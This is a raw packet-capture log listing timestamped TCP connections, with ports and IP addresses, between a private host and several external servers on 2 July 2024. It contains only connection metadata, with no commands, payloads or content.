Jul 2, 2024 00:05:08.269342899 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.269352913 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.269381046 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.269403934 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.269414902 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.269424915 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.269434929 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.269445896 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.269467115 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.269525051 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.269531965 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.269543886 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.269553900 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.269588947 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.269613981 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.269623995 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.269684076 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.269777060 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.269836903 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.270112991 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.270123959 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.270165920 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.270193100 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.270270109 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.270282030 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.270298958 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.270308018 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.270308018 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.270309925 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.270322084 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.270329952 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.270370007 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.270370007 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.270464897 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.270474911 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.270484924 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.270494938 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.270505905 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.270515919 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.270523071 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.270526886 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.270574093 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.270576954 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.270576954 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.270585060 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.270601034 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.270653963 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.270653963 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.271219969 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.271229982 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.271239996 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.271275043 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.271280050 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.271286011 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.271296978 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.271301985 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.271307945 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.271325111 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.271332026 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.271336079 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.271347046 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.271357059 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.271365881 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.271394968 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.271394968 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.271624088 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.271640062 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.271651030 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.271697998 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.271697998 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.271773100 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.271785021 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.271796942 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.271806955 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.271825075 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.271825075 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.271852016 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.271970034 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.271981001 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.271991968 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.272002935 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.272013903 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.272022963 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.272023916 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.272036076 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.272059917 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.272059917 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.272135019 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.272809029 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.272819996 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.272830963 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.272840977 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.272850990 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.272861004 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.272871017 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.272874117 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.272874117 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.272901058 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.272907972 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.272912979 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.272923946 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.272933960 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.272943974 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.272950888 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.272957087 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.272972107 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.272974968 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.272998095 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.273036003 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.273514032 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.273524046 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.273535013 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.273565054 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.273593903 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.273610115 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.273619890 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.273632050 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.273648977 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.273648977 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.273665905 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.273684025 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.273778915 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.273792028 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.273801088 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.273812056 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.273822069 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.273833036 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.273843050 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.273845911 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.273864031 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.273900032 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.273900032 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.274399042 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.274410963 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.274420977 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.274452925 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.274478912 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.274547100 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.274557114 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.274566889 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.274578094 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.274593115 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.274631977 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.274718046 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.274729013 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.274739027 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.274749994 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.274760008 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.274770975 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.274774075 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.274782896 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.274787903 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.274820089 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.274820089 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.275271893 CEST	49732	443	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:08.275299072 CEST	443	49732	104.192.141.1	192.168.2.6
Jul 2, 2024 00:05:08.275357962 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.275372028 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.275382042 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.275405884 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.275450945 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.275492907 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.275504112 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.275512934 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.275522947 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.275535107 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.275557041 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.275592089 CEST	443	49732	104.192.141.1	192.168.2.6
Jul 2, 2024 00:05:08.275626898 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.275639057 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.275648117 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.275657892 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.275676012 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.275682926 CEST	49732	443	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:08.275686026 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.275686026 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.275697947 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.275717020 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.276953936 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.277086973 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.280365944 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.280378103 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.280389071 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.280422926 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.280438900 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.280476093 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.280489922 CEST	443	49727	162.159.133.233	192.168.2.6
Jul 2, 2024 00:05:08.280495882 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.280505896 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.280515909 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.280527115 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.280570030 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.280570030 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.280755997 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.280766010 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.280775070 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.280785084 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.280795097 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.280806065 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.280807972 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.280807972 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.280817986 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.280827999 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.280838013 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.280848026 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.280875921 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.280875921 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.280888081 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.281203985 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.281214952 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.281224966 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.281248093 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.281266928 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.281271935 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.281279087 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.281289101 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.281301022 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.281322956 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.281353951 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.281395912 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.281405926 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.281414986 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.281424999 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.281435013 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.281445026 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.281455040 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.281461000 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.281461000 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.281465054 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.281508923 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.281508923 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.281833887 CEST	49736	443	192.168.2.6	45.130.41.108
Jul 2, 2024 00:05:08.281852961 CEST	443	49736	45.130.41.108	192.168.2.6
Jul 2, 2024 00:05:08.281898975 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.281909943 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.281919003 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.281928062 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.281938076 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.281954050 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.281965971 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.281965971 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.281970024 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.281980991 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.281991005 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282000065 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282011032 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282021046 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282021046 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.282021046 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.282031059 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282041073 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282047033 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282051086 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.282057047 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282067060 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282078028 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282085896 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.282121897 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.282121897 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.282444954 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282582045 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282592058 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282598972 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.282602072 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282612085 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282622099 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282627106 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.282632113 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282641888 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282651901 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282656908 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282660007 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.282666922 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282674074 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.282677889 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282686949 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282696009 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.282705069 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282716990 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282726049 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282736063 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282741070 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.282741070 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.282747984 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282757998 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282768011 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282773972 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.282778978 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282788992 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282793999 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.282799006 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282810926 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282815933 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.282821894 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282831907 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282841921 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.282852888 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.282852888 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.282886982 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.282932997 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.284765005 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.284775972 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.284786940 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.284833908 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.284858942 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.284868956 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.284879923 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.284892082 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.284904003 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.284904003 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.284934998 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.285044909 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.285056114 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.285065889 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.285074949 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.285084963 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.285094976 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.285104990 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.285106897 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.285106897 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.285115957 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.285120010 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.285152912 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.286300898 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.286385059 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.286456108 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.286503077 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.286525965 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.286609888 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.286638021 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.286648989 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.286658049 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.286667109 CEST	80	49714	77.105.133.27	192.168.2.6
